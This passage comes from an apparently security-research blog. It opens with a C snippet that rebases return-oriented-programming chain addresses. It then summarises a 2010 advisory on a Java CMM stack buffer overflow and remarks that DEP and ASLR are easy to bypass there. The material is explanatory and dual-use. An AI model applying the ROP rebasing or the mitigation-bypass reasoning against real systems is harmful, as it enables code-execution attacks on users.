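{
    for (size_t i = 0; i < n; i++)
        if (chain[i] >= PREFERRED_BASE && chain[i] - PREFERRED_BASE < image_size)
            chain[i] = rebase(chain[i], actual_base);
}
```

The range test is a heuristic: any padding value or constant that happened to fall inside the image range would also be rewritten, so a real exploit would track explicitly which entries are addresses.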

Next week part 2 of this post will look at a simple compile time convention I have been experimenting with to help mitigate return oriented attacks.

Tuesday, 6 April 2010

Sun Java CMM readMabCurveData Stack Buffer Overflow Vulnerability

TippingPoint's Zero Day Initiative (ZDI) have published an advisory for a stack based buffer overflow vulnerability in Sun Microsystems (a subsidiary of Oracle) Java. The flaw is in the readMabCurveData function of the CMM module. The vulnerability affects all versions of Java on Windows, Linux and Solaris released over the last 5 years, on both the x86 and x64 architectures. The Mac OS X Java build is also affected.

The vulnerability can be exploited by an attacker through a malicious Java applet embedded in a web page and leads to arbitrary code execution in the context of the user who visits the web page. Because this vulnerability is a stack buffer overflow, reliable exploitation is trivial. Mitigations such as DEP and ASLR can easily be bypassed, as the Java Virtual Machine's heap is executable and has a predictable layout.

This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:

You can read the full Oracle advisory here: